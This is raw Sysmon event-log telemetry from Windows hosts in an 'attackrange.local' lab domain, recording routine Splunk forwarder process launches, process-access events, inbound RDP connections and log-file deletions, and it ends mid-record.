09:04:27.301{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977246Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977245Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977244Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-891B-6151-9179-00000000FD01}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977243Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977242Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977241Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977240Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977239Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977238Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.301{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-891B-6151-9179-00000000FD01}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977237Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:27.287{69CF5F33-891B-6151-9179-00000000FD01}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977236Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:23.837{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-57509-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977279Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:25.735{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-48997-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:04:28.810{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8BFB948E4B798A8AD923D9980437216,SHA256=30CCFC727C2A7985641DA4C9AE2200D7EB3F6D79EBE1EB74E2AD272AA4C8FF39,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977278Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-891C-6151-9379-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977277Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977276Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977275Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977274Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977273Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977272Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977271Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977270Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977269Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977268Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-891C-6151-9379-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977267Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.505{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-891C-6151-9379-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977266Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.490{69CF5F33-891C-6151-9379-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000977265Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:28.255{69CF5F33-891B-6151-9279-00000000FD01}35403028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977296Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:04:29.989{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 